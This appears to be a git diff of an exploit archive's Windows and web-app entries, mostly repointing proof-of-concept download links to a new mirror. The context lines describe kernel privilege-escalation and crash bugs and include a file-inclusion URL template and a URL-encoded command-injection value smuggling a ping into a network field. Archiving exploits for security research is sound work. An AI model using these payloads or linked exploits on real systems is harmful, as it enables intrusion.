a/exploits/windows_x86-64/dos/39221.txt b/exploits/windows_x86-64/dos/39221.txt index 1ba65c10a..999124bd4 100644 --- a/exploits/windows_x86-64/dos/39221.txt +++ b/exploits/windows_x86-64/dos/39221.txt @@ -4,4 +4,4 @@ The attached file causes a use-after-free when calling the stage setter. The PoC Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39221.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39221.zip \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/39712.txt b/exploits/windows_x86-64/dos/39712.txt index 6182ffd87..e12682b9a 100644 --- a/exploits/windows_x86-64/dos/39712.txt +++ b/exploits/windows_x86-64/dos/39712.txt @@ -4,4 +4,4 @@ The attached testcases crashes Windows 7 64-bit while attempting to write to an Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39712.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39712.zip \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/40196.txt b/exploits/windows_x86-64/dos/40196.txt index 616cd9d8f..5c626385a 100644 --- a/exploits/windows_x86-64/dos/40196.txt +++ b/exploits/windows_x86-64/dos/40196.txt @@ -23,4 +23,4 @@ Built using Microsoft Visual C++ 12.0 build 40629 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40196.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40196.zip \ No newline at end of file diff --git a/exploits/windows_x86-64/local/20861.txt b/exploits/windows_x86-64/local/20861.txt index 3a99b6306..be7496506 100644 --- a/exploits/windows_x86-64/local/20861.txt +++ b/exploits/windows_x86-64/local/20861.txt @@ -2,4 +2,4 @@ Source: http://packetstormsecurity.org/files/115908/sysret.rar This is proof of concept code that demonstrates the Microsoft Windows kernel (Intel/x64) SYSRET vulnerability as described in MS12-042. The shellcode disables code signing and will grant NT SYSTEM privileges to a specified application or already running process. -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20861.rar \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20861.rar \ No newline at end of file diff --git a/exploits/windows_x86-64/local/39035.txt b/exploits/windows_x86-64/local/39035.txt index 589252750..2eeaedb6b 100644 --- a/exploits/windows_x86-64/local/39035.txt +++ b/exploits/windows_x86-64/local/39035.txt @@ -8,4 +8,4 @@ Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39035.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39035.zip \ No newline at end of file diff --git a/exploits/windows_x86-64/local/39520.txt b/exploits/windows_x86-64/local/39520.txt index 4c0d5c06b..2a26dd7d1 100644 --- a/exploits/windows_x86-64/local/39520.txt +++ b/exploits/windows_x86-64/local/39520.txt @@ -11,4 +11,4 @@ This exploit was tested with 64-bit versions of Windows 7, 8, 8.1 and 10. On SME Proof of Concept: https://github.com/Cr4sh/secretnet_expl/archive/master.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39520.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39520.zip \ No newline at end of file diff --git a/exploits/windows_x86-64/local/40336.py b/exploits/windows_x86-64/local/40336.py index 0eb6a1b42..e50e4ffc5 100755 --- a/exploits/windows_x86-64/local/40336.py +++ b/exploits/windows_x86-64/local/40336.py @@ -64,6 +64,4 @@ try: debug.loop() finally: - debug.stop() - - + debug.stop() \ No newline at end of file diff --git a/exploits/windows_x86-64/local/40337.py b/exploits/windows_x86-64/local/40337.py index bfe8c6b8a..770fbe422 100755 --- a/exploits/windows_x86-64/local/40337.py +++ b/exploits/windows_x86-64/local/40337.py @@ -87,6 +87,4 @@ try: debug.loop() finally: - debug.stop() - - + debug.stop() \ No newline at end of file diff --git a/exploits/windows_x86-64/local/41020.c b/exploits/windows_x86-64/local/41020.c index 68c92b0f2..f8286bc73 100644 --- a/exploits/windows_x86-64/local/41020.c +++ b/exploits/windows_x86-64/local/41020.c @@ -1,5 +1,5 @@ // Source: https://github.com/sensepost/ms16-098/tree/b85b8dfdd20a50fc7bc6c40337b8de99d6c4db80 -// Binary: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe +// Binary: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41020.exe #include <Windows.h> #include <wingdi.h> diff --git a/exploits/windows_x86-64/local/41605.txt b/exploits/windows_x86-64/local/41605.txt index 27b23e0d3..d1e0cced5 100644 --- a/exploits/windows_x86-64/local/41605.txt +++ b/exploits/windows_x86-64/local/41605.txt @@ -17,4 +17,4 @@ More information: - https://github.com/rwfpl/rewolf-pcausa-exploit/tree/4045cd9b45d647430d779f5b0a018a7a11d6ca2a PoC: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41605.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41605.zip \ No newline at end of file diff --git a/exploits/windows_x86-64/local/41908.txt b/exploits/windows_x86-64/local/41908.txt index d6d311ded..2a4ca9130 100644 --- a/exploits/windows_x86-64/local/41908.txt +++ b/exploits/windows_x86-64/local/41908.txt @@ -41,4 +41,4 @@ Scriptlet code is loaded and access to the device driver is allowed. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41908.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41908.zip \ No newline at end of file diff --git a/exploits/windows_x86-64/local/42435.txt b/exploits/windows_x86-64/local/42435.txt index 6c397b7bc..0eca85f56 100644 --- a/exploits/windows_x86-64/local/42435.txt +++ b/exploits/windows_x86-64/local/42435.txt @@ -11,4 +11,4 @@ DC25 5A1F - Demystifying Windows Kernel Exploitation by Abusing GDI Objects Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42435.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42435.zip \ No newline at end of file diff --git a/exploits/windows_x86-64/local/42960.txt b/exploits/windows_x86-64/local/42960.txt index cec12a8eb..dd2c3447c 100644 --- a/exploits/windows_x86-64/local/42960.txt +++ b/exploits/windows_x86-64/local/42960.txt @@ -14,4 +14,4 @@ We also published a blog post (https://siberas.de/blog/2017/10/05/exploitation_c Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42960.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42960.zip \ No newline at end of file diff --git a/exploits/windows_x86-64/local/44313.txt b/exploits/windows_x86-64/local/44313.txt index 8ca75d2f0..56e495fe2 100644 --- a/exploits/windows_x86-64/local/44313.txt +++ b/exploits/windows_x86-64/local/44313.txt @@ -42,4 +42,4 @@ It’s possible to redirect the request for the code page file the SAM registry Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44313.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44313.zip \ No newline at end of file diff --git a/exploits/windows_x86-64/local/47685.txt b/exploits/windows_x86-64/local/47685.txt index 5e16d4072..539f3b582 100644 --- a/exploits/windows_x86-64/local/47685.txt +++ b/exploits/windows_x86-64/local/47685.txt @@ -1 +1 @@ -EDB Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47685.zip +EDB Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47685.zip \ No newline at end of file diff --git a/exploits/windows_x86-64/local/47752.js b/exploits/windows_x86-64/local/47752.js index 3af609202..c8db88246 100644 --- a/exploits/windows_x86-64/local/47752.js +++ b/exploits/windows_x86-64/local/47752.js @@ -1,6 +1,6 @@ // Axel '0vercl0k' Souchet - November 19 2019 -// EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47752.zip +// EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47752.zip // 0:000> ? xul!sAutomationPrefIsSet - xul // Evaluate expression: 85724947 = 00000000`051c0f13 diff --git a/exploits/windows_x86-64/local/47935.cpp b/exploits/windows_x86-64/local/47935.cpp index 34449a66f..a1429d956 100644 --- a/exploits/windows_x86-64/local/47935.cpp +++ b/exploits/windows_x86-64/local/47935.cpp @@ -2,7 +2,7 @@ The exploit works on 19H1. It was tested with ntoskrnl version 10.0.18362.295 -EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47935.zip +EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47935.zip */ #include <Windows.h> diff --git a/exploits/windows_x86/dos/15214.py b/exploits/windows_x86/dos/15214.py index 9c2b7dc19..8976ca400 100755 --- a/exploits/windows_x86/dos/15214.py +++ b/exploits/windows_x86/dos/15214.py @@ -43,4 +43,4 @@ def main(): if __name__=="__main__": main() -#PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15214.zip \ No newline at end of file +#PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15214.zip \ No newline at end of file diff --git a/exploits/windows_x86/dos/37881.txt b/exploits/windows_x86/dos/37881.txt index 785385d44..bd36a5e73 100644 --- a/exploits/windows_x86/dos/37881.txt +++ b/exploits/windows_x86/dos/37881.txt @@ -25,4 +25,4 @@ function func(){ A sample fla, swf and AS file are attached. Note that this PoC needs to be hosted on a webserver to work and only works on 32-bit systems (tested on Windows Chrome). song1.mp3 should be put in the same folder on the server as the swf, it is needed for loadSound to work. This bug is likely only exploitable on 32-bit systems due to how the type-confused fields line up. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37881.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37881.zip \ No newline at end of file diff --git a/exploits/windows_x86/dos/38265.txt b/exploits/windows_x86/dos/38265.txt index 4dd9040e4..ab6a406ff 100644 --- a/exploits/windows_x86/dos/38265.txt +++ b/exploits/windows_x86/dos/38265.txt @@ -9,4 +9,4 @@ please find the PoC and brief analysis for the issue attached. The analysis ment -- Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38265.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38265.zip \ No newline at end of file diff --git a/exploits/windows_x86/dos/38266.txt b/exploits/windows_x86/dos/38266.txt index d95ae82fb..f8a19dcc9 100644 --- a/exploits/windows_x86/dos/38266.txt +++ b/exploits/windows_x86/dos/38266.txt @@ -3,4 +3,4 @@ Source: https://code.google.com/p/google-security-research/issues/detail?id=339 The attached PoC demonstrate a use-after-free condition that occurs when operating on a DeferWindowPos object from multiple threads. The DeferWindowPos() call will trigger and block on the execution of a window procedure in a separate thread from which we call EndDeferWindowPos on the same handle. specialpool.txt contains the debugger output with Session Pool enabled, crash.txt the debugger output without Session Pool. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38266.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38266.zip \ No newline at end of file diff --git a/exploits/windows_x86/dos/38267.txt b/exploits/windows_x86/dos/38267.txt index 1fd6b531c..30dd7def5 100644 --- a/exploits/windows_x86/dos/38267.txt +++ b/exploits/windows_x86/dos/38267.txt @@ -3,4 +3,4 @@ Source: https://code.google.com/p/google-security-research/issues/detail?id=335 Freed memory is accessed after switching between two desktops of which one is closed. The testcase crashes with and without special pool enabled. The attached crash output is with special enabled on win32k.sys and ntoskrnl.sys. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38267.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38267.zip \ No newline at end of file diff --git a/exploits/windows_x86/dos/38268.txt b/exploits/windows_x86/dos/38268.txt index 99ff417d3..6d597ca8b 100644 --- a/exploits/windows_x86/dos/38268.txt +++ b/exploits/windows_x86/dos/38268.txt @@ -3,4 +3,4 @@ Source: https://code.google.com/p/google-security-research/issues/detail?id=321 The PoC triggers a crashes due to a pool buffer overflow while drawing the caption bar of window. The trigger depends on the current window layout and resolution. The PoC takes an offset on the command line to be able to test with different values, I tested this on two different Win7 32-bit VM's and had success with 0 and 475000 (Resolution was 1024x768 and 1280x1024). A bruteforce Python script is also attached which should trigger a crash fairly quickly. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38268.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38268.zip \ No newline at end of file diff --git a/exploits/windows_x86/dos/38269.txt b/exploits/windows_x86/dos/38269.txt index e3d448fda..b56448297 100644 --- a/exploits/windows_x86/dos/38269.txt +++ b/exploits/windows_x86/dos/38269.txt @@ -3,4 +3,4 @@ Source: https://code.google.com/p/google-security-research/issues/detail?id=320 The PoC bug checks reliably with Special Pool enabled on writing to freed memory. A reference to the freed memory is held at offset +0x10 of the THREADINFO object. This memory is referenced in HmgAllocateObjectAttr which is called in multiple locations. The freed memory is a struct inside a Brush Object which is freed in the call NtGdiDeleteObjectApp. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38269.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38269.zip \ No newline at end of file diff --git a/exploits/windows_x86/dos/38270.txt b/exploits/windows_x86/dos/38270.txt index ddb258f52..5bc3d7d72 100644 --- a/exploits/windows_x86/dos/38270.txt +++ b/exploits/windows_x86/dos/38270.txt @@ -3,4 +3,4 @@ Source: https://code.google.com/p/google-security-research/issues/detail?id=313 The PoC triggers a pool buffer overflow in win32k!vSolidFillRect. When using Special Pool we get the crash immediately on the overwrite. Without Special Pool we often get a crash in the same function, but sometimes it crashes in a different function (similar to another issue, however with a different offset). This might be a result of the memory corruption or an out-of-memory condition before the overflow is triggered. Debugger output for all three different crashes attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38270.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38270.zip \ No newline at end of file diff --git a/exploits/windows_x86/dos/38271.txt b/exploits/windows_x86/dos/38271.txt index 6fdba8b9b..53bad309b 100644 --- a/exploits/windows_x86/dos/38271.txt +++ b/exploits/windows_x86/dos/38271.txt @@ -4,4 +4,4 @@ This issue is very likely a null pointer issue affecting 32-bit Windows version. Debug output attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38271.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38271.zip \ No newline at end of file diff --git a/exploits/windows_x86/dos/38273.txt b/exploits/windows_x86/dos/38273.txt index 9fff096ef..fdbaa160e 100644 --- a/exploits/windows_x86/dos/38273.txt +++ b/exploits/windows_x86/dos/38273.txt @@ -8,4 +8,4 @@ trigger.cpp should fire the issue, with caveats: Analysis is attached as a text file. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38273.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38273.zip \ No newline at end of file diff --git a/exploits/windows_x86/dos/38274.txt b/exploits/windows_x86/dos/38274.txt index 4b2af36f0..4711c6ccb 100644 --- a/exploits/windows_x86/dos/38274.txt +++ b/exploits/windows_x86/dos/38274.txt @@ -20,4 +20,4 @@ win32k!HMChangeOwnerThread+0x40: --- Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38274.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38274.zip \ No newline at end of file diff --git a/exploits/windows_x86/dos/38275.txt b/exploits/windows_x86/dos/38275.txt index 12a08739b..40001cfca 100644 --- a/exploits/windows_x86/dos/38275.txt +++ b/exploits/windows_x86/dos/38275.txt @@ -16,4 +16,4 @@ At this time we are able to replace the freed object in memory. We are not able --- Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38275.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38275.zip \ No newline at end of file diff --git a/exploits/windows_x86/dos/38276.txt b/exploits/windows_x86/dos/38276.txt index e828bb6df..fafe9680d 100644 --- a/exploits/windows_x86/dos/38276.txt +++ b/exploits/windows_x86/dos/38276.txt @@ -5,4 +5,4 @@ The attached PoC triggers a wild write on Win 7 32-bit with Special Pool enabled --- Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38276.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38276.zip \ No newline at end of file diff --git a/exploits/windows_x86/dos/38277.txt b/exploits/windows_x86/dos/38277.txt index bbab263fc..fe25a8eee 100644 --- a/exploits/windows_x86/dos/38277.txt +++ b/exploits/windows_x86/dos/38277.txt @@ -5,4 +5,4 @@ The attached testcase crashes Win 7 with Special Pool on win32k while accessing --- Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38277.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38277.zip \ No newline at end of file diff --git a/exploits/windows_x86/dos/38278.txt b/exploits/windows_x86/dos/38278.txt index cb1b3f8e6..34f3a539e 100644 --- a/exploits/windows_x86/dos/38278.txt +++ b/exploits/windows_x86/dos/38278.txt @@ -4,4 +4,4 @@ Source: https://code.google.com/p/google-security-research/issues/detail?id=457 The attached testcase crashes Win 7 with Special Pool enabled while accessing the freed global cursor object (_gpqCursor). See poc.cpp for instructions on how to compile and run. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38278.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38278.zip \ No newline at end of file diff --git a/exploits/windows_x86/dos/38279.txt b/exploits/windows_x86/dos/38279.txt index 9541e8a1a..cfa66ad19 100644 --- a/exploits/windows_x86/dos/38279.txt +++ b/exploits/windows_x86/dos/38279.txt @@ -5,4 +5,4 @@ The attached PoC demonstrates a UAF condition with printer device contexts. The --- Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38279.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38279.zip \ No newline at end of file diff --git a/exploits/windows_x86/dos/38280.txt b/exploits/windows_x86/dos/38280.txt index 2a71f52b6..a1a8066bb 100644 --- a/exploits/windows_x86/dos/38280.txt +++ b/exploits/windows_x86/dos/38280.txt @@ -7,4 +7,4 @@ Multiple pool buffer overflows can be triggered through the NtGdiStretchBlt syst --- Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38280.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38280.zip \ No newline at end of file diff --git a/exploits/windows_x86/dos/38307.txt b/exploits/windows_x86/dos/38307.txt index a410a38c8..7767fd4e5 100644 --- a/exploits/windows_x86/dos/38307.txt +++ b/exploits/windows_x86/dos/38307.txt @@ -5,4 +5,4 @@ The attached PoC triggers a buffer overflow in the NtGdiBitBlt system call. It r --- Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38307.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38307.zip \ No newline at end of file diff --git a/exploits/windows_x86/dos/39026.txt b/exploits/windows_x86/dos/39026.txt index 62b9e1766..19af9b166 100644 --- a/exploits/windows_x86/dos/39026.txt +++ b/exploits/windows_x86/dos/39026.txt @@ -7,4 +7,4 @@ Note that multiple PoC executions and simulated system activity (such as opening Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39026.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39026.zip \ No newline at end of file diff --git a/exploits/windows_x86/dos/39027.txt b/exploits/windows_x86/dos/39027.txt index 649609e74..8238173ab 100644 --- a/exploits/windows_x86/dos/39027.txt +++ b/exploits/windows_x86/dos/39027.txt @@ -7,4 +7,4 @@ Note that multiple PoC executions and simulated system activity may be required Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39027.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39027.zip \ No newline at end of file diff --git a/exploits/windows_x86/dos/39993.txt b/exploits/windows_x86/dos/39993.txt index b39d5573c..7b98f1e79 100644 --- a/exploits/windows_x86/dos/39993.txt +++ b/exploits/windows_x86/dos/39993.txt @@ -50,4 +50,4 @@ The font is loaded and can be used with GDI. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39993.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39993.zip \ No newline at end of file diff --git a/exploits/windows_x86/local/38403.txt b/exploits/windows_x86/local/38403.txt index b5b9d81ae..a081e8b67 100644 --- a/exploits/windows_x86/local/38403.txt +++ b/exploits/windows_x86/local/38403.txt @@ -52,4 +52,4 @@ Observed Result: The global drive specified has been replaced with a link to the encrypted volume. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38403.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38403.zip \ No newline at end of file diff --git a/exploits/windows_x86/local/39432.c b/exploits/windows_x86/local/39432.c index 7dd72ab4d..3036030bb 100644 --- a/exploits/windows_x86/local/39432.c +++ b/exploits/windows_x86/local/39432.c @@ -5,7 +5,7 @@ Proof-of-concept BSoD (Blue Screen of Death) code for CVE-2016-0051 (MS-016). Full Proof of Concept: - https://github.com/koczkatamas/CVE-2016-0051/archive/master.zip -- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39432-1.zip +- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39432-1.zip Elevation of Privilege (SYSTEM) exploit for CVE-2016-0051 (MS16-016) for Windows 7 SP1 x86 (build 7601) diff --git a/exploits/windows_x86/local/40039.cpp b/exploits/windows_x86/local/40039.cpp index 43d9a1404..a2bbbd011 100644 --- a/exploits/windows_x86/local/40039.cpp +++ b/exploits/windows_x86/local/40039.cpp @@ -14,7 +14,7 @@ Overwrites HaliSystemQueryInformation, but does not replace it, so BSOD will occ ********* EDB Note ********* -ntos.h is available here: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40039.zip +ntos.h is available here: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40039.zip *************************** diff --git a/exploits/windows_x86/local/42432.cpp b/exploits/windows_x86/local/42432.cpp index 8c055facb..9f51fd418 100644 --- a/exploits/windows_x86/local/42432.cpp +++ b/exploits/windows_x86/local/42432.cpp @@ -1,6 +1,6 @@ # E-DB Note: # + Source: https://github.com/sensepost/gdi-palettes-exp -# + Binary: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42432.exe +# + Binary: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42432.exe #include <Windows.h> #include <stdio.h> diff --git a/exploits/windows_x86/local/42930.txt b/exploits/windows_x86/local/42930.txt index f97903b45..fb6a1bedb 100644 --- a/exploits/windows_x86/local/42930.txt +++ b/exploits/windows_x86/local/42930.txt @@ -128,5 +128,4 @@ is able to somehow bypass it, the vulnerability will surely affect the latest ve Tested on: Any Windows version that suppors Office 2007. -Greets to: Juan Pablo Lopez Yacubian, my good friend and original discoverer of the IE Script Exec issue. - +Greets to: Juan Pablo Lopez Yacubian, my good friend and original discoverer of the IE Script Exec issue. \ No newline at end of file diff --git a/exploits/windows_x86/local/43366.md b/exploits/windows_x86/local/43366.md index df190bb5b..855696c7c 100644 --- a/exploits/windows_x86/local/43366.md +++ b/exploits/windows_x86/local/43366.md @@ -31,4 +31,4 @@ [@timse93](https://github.com/timse93) - Research and Testing ## EDB-Note -Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43366.zip \ No newline at end of file +Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43366.zip \ No newline at end of file diff --git a/exploits/windows_x86/local/46918.txt b/exploits/windows_x86/local/46918.txt index 88b64b3d2..21bc4feb9 100644 --- a/exploits/windows_x86/local/46918.txt +++ b/exploits/windows_x86/local/46918.txt @@ -69,4 +69,4 @@ Limitations Obviously to run to PoC we have to pass a username and password. However, this can be the account information of a local non admin account, meaning it still crosses a security boundary. But for malware it would be harder to use this, since it's not that easy to obtain a cleartext password and even if we call _SchRpcRegisterTask directly, it still has a struct _TASK_USER_CRED argument, and I assume this expects clear text account info and not a token or something. Maybe you can use the Guest account or something when calling _schrpcregistertask directly. -EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46918.zip \ No newline at end of file +EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46918.zip \ No newline at end of file diff --git a/exploits/windows_x86/local/47176.cpp b/exploits/windows_x86/local/47176.cpp index 14b1ba2a9..3ca2d57ac 100644 --- a/exploits/windows_x86/local/47176.cpp +++ b/exploits/windows_x86/local/47176.cpp @@ -2,7 +2,7 @@ #include <iostream> /* -EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47176.zip +EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47176.zip */ /* PREPROCESSOR DEFINITIONS */ diff --git a/exploits/windows_x86/local/8799.txt b/exploits/windows_x86/local/8799.txt index 061af33dc..3c10cf878 100644 --- a/exploits/windows_x86/local/8799.txt +++ b/exploits/windows_x86/local/8799.txt @@ -28,7 +28,7 @@ php implement "\" character can escape safemode using function like excec . PoC / Exploit : orginal : www.abysssec.com/safemod-windows.zip -mirror : https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8799.zip (2009-safemod-windows.zip) +mirror : https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8799.zip (2009-safemod-windows.zip) diff --git a/exploits/windows_x86/remote/11615.txt b/exploits/windows_x86/remote/11615.txt index 4f371cfd1..1cd535e7c 100644 --- a/exploits/windows_x86/remote/11615.txt +++ b/exploits/windows_x86/remote/11615.txt @@ -11,7 +11,7 @@ Internet Explorer 6, 7, and 8 are vulnerable when running on the Windows XP plat =============================================================== A copy of test.hlp can be downloaded from here: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11615.zip (msgbox_test_help.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11615.zip (msgbox_test_help.zip) =============================================================== <html> diff --git a/exploits/windows_x86/remote/47683.py b/exploits/windows_x86/remote/47683.py index d8cdcf1c1..4b5f7c40f 100755 --- a/exploits/windows_x86/remote/47683.py +++ b/exploits/windows_x86/remote/47683.py @@ -1,4 +1,4 @@ -# EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47683.zip +# EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47683.zip import rdp import socket diff --git a/exploits/windows_x86/webapps/14628.txt b/exploits/windows_x86/webapps/14628.txt index df5504458..e30698799 100644 --- a/exploits/windows_x86/webapps/14628.txt +++ b/exploits/windows_x86/webapps/14628.txt @@ -8,6 +8,4 @@ Exploit: http://target/PHP-Nuke-8.1-seo-Arabic/PHP-Nuke-8.1-seo-Arabic/html/main Exploit: http://target/PHP-Nuke-8.1-seo-Arabic/PHP-Nuke-8.1-seo-Arabic/html/index.php?ThemeSel=[shell]____________________________________________ -A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers - - +A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers \ No newline at end of file diff --git a/exploits/xml/webapps/41855.sh b/exploits/xml/webapps/41855.sh index 9a380e1cd..326951d15 100755 --- a/exploits/xml/webapps/41855.sh +++ b/exploits/xml/webapps/41855.sh @@ -224,4 +224,4 @@ do done -ExitCleanup 0 +ExitCleanup 0 \ No newline at end of file diff --git a/exploits/xml/webapps/42089.txt b/exploits/xml/webapps/42089.txt index 7207a3d08..21442fb8c 100644 --- a/exploits/xml/webapps/42089.txt +++ b/exploits/xml/webapps/42089.txt @@ -121,4 +121,4 @@ Proof of Concept: 14 oldport=&netid=192.168.1.0%7c%7c%60ping%20 15 c%2021%20127.0.0.1%60%20%23'%7c%7c%60ping%20 16 